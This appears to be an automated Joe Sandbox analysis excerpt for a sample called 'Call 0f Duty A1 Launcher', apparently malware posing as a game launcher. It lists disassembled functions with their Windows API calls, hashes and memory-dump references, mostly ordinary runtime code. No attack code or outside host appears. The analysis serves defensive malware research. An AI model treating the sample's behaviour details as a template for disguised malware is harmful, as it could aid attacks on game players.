Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 006BBF10

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7116c434f49fe49f352e854c9e9f2f798cc9753bec4dca27d4bffcb62dea206c
Instruction ID: 104ac9da2cb962fdd72dbfa16baadb7546189cb9c51a10395ee276fe2e7b2815
Opcode Fuzzy Hash: 7116c434f49fe49f352e854c9e9f2f798cc9753bec4dca27d4bffcb62dea206c
Instruction Fuzzy Hash: C67158B4E05209CFCB04DFACD5586EEBBF2EB48710F10851EE846AB350DB759A858F52

Function 006C6CE6 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,Function_00016E00,00000000,?,?), ref: 006C6D2F
GetLastError.KERNEL32(?,00000000,00000000,?,006C3BEA), ref: 006C6D3B
__dosmaperr.LIBCMT ref: 006C6D42

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 92088c4e93c2e8b278f1a0675a5708d42eb0986de5791ecee1a593c90cbe1137
Instruction ID: 44af937df5a2a0d5bde24adb01a09c54e30f6be1df225b68423478b1e01bd5be
Opcode Fuzzy Hash: 92088c4e93c2e8b278f1a0675a5708d42eb0986de5791ecee1a593c90cbe1137
Instruction Fuzzy Hash: 8D014072600259ABDF159FA0DC06FFE3BA6EF40754F10405DB80296250DB70EE50DBA8

Function 006C6FEF Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000002,?,006C70B1,006C83A0,006C83A0,?,00000002,C362B542,006C83A0,00000002), ref: 006C7000
TerminateProcess.KERNEL32(00000000,?,006C70B1,006C83A0,006C83A0,?,00000002,C362B542,006C83A0,00000002), ref: 006C7007
ExitProcess.KERNEL32 ref: 006C7019

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: bd86384de9e79b333086c96f7e5bfed2b0715ddc0dfd2b2ffa2b51e91e8f72ab
Instruction ID: 282539524313a17fa79c3bae04e59ea477809a9e41cfb38606eaf263320bd6dd
Opcode Fuzzy Hash: bd86384de9e79b333086c96f7e5bfed2b0715ddc0dfd2b2ffa2b51e91e8f72ab
Instruction Fuzzy Hash: 17D06C31405108ABCF513F60ED0AEAD3F6BEF44351B049019B9198A162CB35999ADBA8

Function 006C41C6 Relevance: 3.1, APIs: 2, Instructions: 93
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006C49EA
___raise_securityfailure.LIBCMT ref: 006C4AD2

Part of subcall function 006C59FC: RaiseException.KERNEL32(E06D7363,00000001,00000003,006C49DE,C362B542,?,?,?,006C49DE,?,006D9B2C), ref: 006C5A5C

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
String ID:
API String ID: 3749517692-0
Opcode ID: 4dbb1c63038311cfb942950021a393e350eca5966260fabf256ec682a7b3328e
Instruction ID: b6cea0c2de0ad645c5c536686ec442341f4e40765b01dc22d692cc90ea5e6107
Opcode Fuzzy Hash: 4dbb1c63038311cfb942950021a393e350eca5966260fabf256ec682a7b3328e
Instruction Fuzzy Hash: E0316DB4D0220A9ED700DF55FD56B697BABFB08320F10626FE908C63A1EB70A595CB44

Function 006CA732 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,006CA621,006DA088,0000000C), ref: 006CA77E
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,006CA621,006DA088,0000000C), ref: 006CA790

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 4dd522cf7edbdd62161c9bfd76998f6736938f38ba3f857d6444eadfbe222071
Instruction ID: 9fbf652cfc04b87268d0df83d2ffa13e62cb8ef7464e9580bdb616bf71083e3c
Opcode Fuzzy Hash: 4dd522cf7edbdd62161c9bfd76998f6736938f38ba3f857d6444eadfbe222071
Instruction Fuzzy Hash: 4211A8799047494ACB304E7D8C88F727AA7FB56338734071ED5B6C66F1C234D846D662

Function 006C6E00 Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(006D9D20,0000000C), ref: 006C6E13
ExitThread.KERNEL32 ref: 006C6E1A

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: f4a34ebd7890626d96ad342440db4df5bb2969e504c5b13e0b5fd34158bf5b66
Instruction ID: 67d667e634994a15beb7e51cd13f19ad1560fa5cc4df1b891800ba197d9f8dd2
Opcode Fuzzy Hash: f4a34ebd7890626d96ad342440db4df5bb2969e504c5b13e0b5fd34158bf5b66
Instruction Fuzzy Hash: 0EF04975A00605AFDB51AFB0C84AF7E3BA7FF05710F10454EF0069B2A2DB75A901CBA5

Function 006CB0CB Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,006CBC39,?,00000000,?,?,006CBB55,?,00000007,?,?,006CC16E,?,?), ref: 006CB0E1
GetLastError.KERNEL32(?,?,006CBC39,?,00000000,?,?,006CBB55,?,00000007,?,?,006CC16E,?,?), ref: 006CB0EC

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4869a82c1d66dbc52179978e7adebfc1c4bdafb6e2e4d279a63c5f99eab6a54b
Instruction ID: f6be23da00ae5c7cb5adfc645df899210f6657cf736bdbc2a31e80b26b4f7fe4
Opcode Fuzzy Hash: 4869a82c1d66dbc52179978e7adebfc1c4bdafb6e2e4d279a63c5f99eab6a54b
Instruction Fuzzy Hash: 98E0CD3190134867CB112FA0FC0EFA93B9FDF84351F042029F50CC6561C7348950CBA8

Function 006C3B60 Relevance: 1.6, APIs: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae443b98c721a18d5eb25ec4ecf33a915da4ed421bc63d1bbe55bd49bd8c85d8
Instruction ID: b2e176862f686d43e2fb22128a5ecd37d9707cb1557efa0a8294781f296a6d47
Opcode Fuzzy Hash: ae443b98c721a18d5eb25ec4ecf33a915da4ed421bc63d1bbe55bd49bd8c85d8
Instruction Fuzzy Hash: 9231C1B4D042198BCB44DFA9C594ABEBBF2EF48304F10C42EE456AB340DB35AA05CF59

Function 006C9E9E Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca196c148b9255e5cfe8b1bd37dbf23176040af2537a4b72527d6257e2edcfce
Instruction ID: 385ae42df7d1632c15d3dce1f6ca924812b56a0d5c96d86c443200935ea2ca73
Opcode Fuzzy Hash: ca196c148b9255e5cfe8b1bd37dbf23176040af2537a4b72527d6257e2edcfce
Instruction Fuzzy Hash: B301F533A042199B9B028F69EC48F7677ABFBC9320729512DF914DB258EB30D80187E4

Function 006BCD90 Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEllipticRgn.GDI32 ref: 006BCDF9

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: CreateElliptic
String ID:
API String ID: 1611293138-0
Opcode ID: 53f0e19b2ec47364e44072ba7575c6136fe2a080980a9099d6a02e12987c456b
Instruction ID: 01f0451aa4f386974f87aa26d83332d7742ae558d2cbe47e3a1c2d9a9ed1fe26
Opcode Fuzzy Hash: 53f0e19b2ec47364e44072ba7575c6136fe2a080980a9099d6a02e12987c456b
Instruction Fuzzy Hash: B211D6B4D002099BCB04EFA8C4557EEBBF1EF48314F40892ED855A7354EB74A644CB95

Function 006CBC45 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,006C41E0,?,?,006C1007,?,006BFAB5), ref: 006CBC77

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3084beb045ee4759d87a91a41d54fdac8c1a5895df7658e1311b0c9a06a3dd7e
Instruction ID: 9a82c538c8547750bfcd2abec019de850fee619d09995ee3a24aa37726bb982a
Opcode Fuzzy Hash: 3084beb045ee4759d87a91a41d54fdac8c1a5895df7658e1311b0c9a06a3dd7e
Instruction Fuzzy Hash: B3E0A9319016666AEB2126619C07FFB3A4BEB813A0F04312EBC2496290CF21C801C2A8

Non-executed Functions

Function 006C4CA2 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006C4CB6
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 006C4CC4
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 006C4CD5
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 006C4CE6
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 006C4CF7
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 006C4D08
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 006C4D19
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 006C4D2A
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 006C4D3B
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 006C4D4C
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 006C4D5D
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 006C4D6E
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 006C4D7F
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 006C4D90
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 006C4DA1
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 006C4DB2
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 006C4DC3
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 006C4DD4
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 006C4DE5
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 006C4DF6
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 006C4E07
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 006C4E18
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 006C4E29
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 006C4E3A
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 006C4E4B
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 006C4E5C
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006C4E6D
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 006C4E7E
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006C4E8F
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006C4EA0
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 006C4EB1
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 006C4EC2
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 006C4ED3
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 006C4EE4
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 006C4EF5
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 006C4F06
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 006C4F17
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 006C4F28
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 006C4F39
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 006C4F4A
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 006C4F5B

Strings

TryAcquireSRWLockExclusive, xrefs: 006C4EC8
CloseThreadpoolWait, xrefs: 006C4DB8
AcquireSRWLockExclusive, xrefs: 006C4EB7
GetLocaleInfoEx, xrefs: 006C4F3F
CloseThreadpoolWork, xrefs: 006C4F1D
WaitForThreadpoolTimerCallbacks, xrefs: 006C4D74
CompareStringEx, xrefs: 006C4F2E
InitOnceExecuteOnce, xrefs: 006C4D0E
CreateSemaphoreW, xrefs: 006C4D30
GetSystemTimePreciseAsFileTime, xrefs: 006C4E51
ReleaseSRWLockExclusive, xrefs: 006C4ED9
LCMapStringEx, xrefs: 006C4F50
kernel32.dll, xrefs: 006C4CB1
FreeLibraryWhenCallbackReturns, xrefs: 006C4DDA
CreateEventExW, xrefs: 006C4D1F
GetFileInformationByHandleEx, xrefs: 006C4E2F
WakeAllConditionVariable, xrefs: 006C4E84
CreateThreadpoolTimer, xrefs: 006C4D52
InitializeCriticalSectionEx, xrefs: 006C4CFD
SleepConditionVariableSRW, xrefs: 006C4EEA
SleepConditionVariableCS, xrefs: 006C4E95
SetThreadpoolWait, xrefs: 006C4DA7
GetCurrentPackageId, xrefs: 006C4E0D
CreateThreadpoolWait, xrefs: 006C4D96
WakeConditionVariable, xrefs: 006C4E73
GetTickCount64, xrefs: 006C4E1E
FlushProcessWriteBuffers, xrefs: 006C4DC9
SetThreadpoolTimer, xrefs: 006C4D63
InitializeSRWLock, xrefs: 006C4EA6
InitializeConditionVariable, xrefs: 006C4E62
FlsGetValue, xrefs: 006C4CDB
SetFileInformationByHandle, xrefs: 006C4E40
FlsFree, xrefs: 006C4CCA
CreateSemaphoreExW, xrefs: 006C4D41
FlsSetValue, xrefs: 006C4CEC
CloseThreadpoolTimer, xrefs: 006C4D85
SubmitThreadpoolWork, xrefs: 006C4F0C
CreateThreadpoolWork, xrefs: 006C4EFB
FlsAlloc, xrefs: 006C4CBE
CreateSymbolicLinkW, xrefs: 006C4E01
GetCurrentProcessorNumber, xrefs: 006C4DEB

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 50d46d1ef325438ef93db05ca425a465f5e485e13f79b4dc258f2f58395b6cdb
Instruction ID: 908fcd08c1b637436dd30c17a9b086650dbb72c9ecd55a86936556a942be4431
Opcode Fuzzy Hash: 50d46d1ef325438ef93db05ca425a465f5e485e13f79b4dc258f2f58395b6cdb
Instruction Fuzzy Hash: 66611B71D93395ABC7806FF5AD098E63FEBAB497123416517F101D23A2DBB46081DBB0

Function 006BCE70 Relevance: 8.0, APIs: 5, Instructions: 518threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006BCF90
std::_Throw_Cpp_error.LIBCPMT ref: 006BD216

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: Cpp_errorCurrentThreadThrow_std::_
String ID:
API String ID: 350343453-0
Opcode ID: 2002d6d2764030d7748889961372e222af8929f356465018f17d112fd29f270c
Instruction ID: 1c2b1330f6747b251a709c01380ecf5e4619d54eca8dc3ddd1c4eac91000cd20
Opcode Fuzzy Hash: 2002d6d2764030d7748889961372e222af8929f356465018f17d112fd29f270c
Instruction Fuzzy Hash: 10F1FAB6E505104FEB008A7CC8A83DF6BE78B66330F2A5729DA745F7D2D627444A8F40

Function 006CC7DB Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 006CC8CB
FindNextFileW.KERNEL32(00000000,?), ref: 006CC9BF
FindClose.KERNEL32(00000000), ref: 006CC9FE
FindClose.KERNEL32(00000000), ref: 006CCA31

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 5d434c009431431f9e96fda4cb132caf70d33b1f8dbce5fec8ec7a82d97b6f3c
Instruction ID: e1ba9ac6d4a19e085011d63527435bebb1622fe4b7eff3923972522f0ef287c1
Opcode Fuzzy Hash: 5d434c009431431f9e96fda4cb132caf70d33b1f8dbce5fec8ec7a82d97b6f3c
Instruction Fuzzy Hash: 5E719C719051689EDF20AF688C9DFFABBBAEB05320F1441DDE04DA3251DB308E859F64

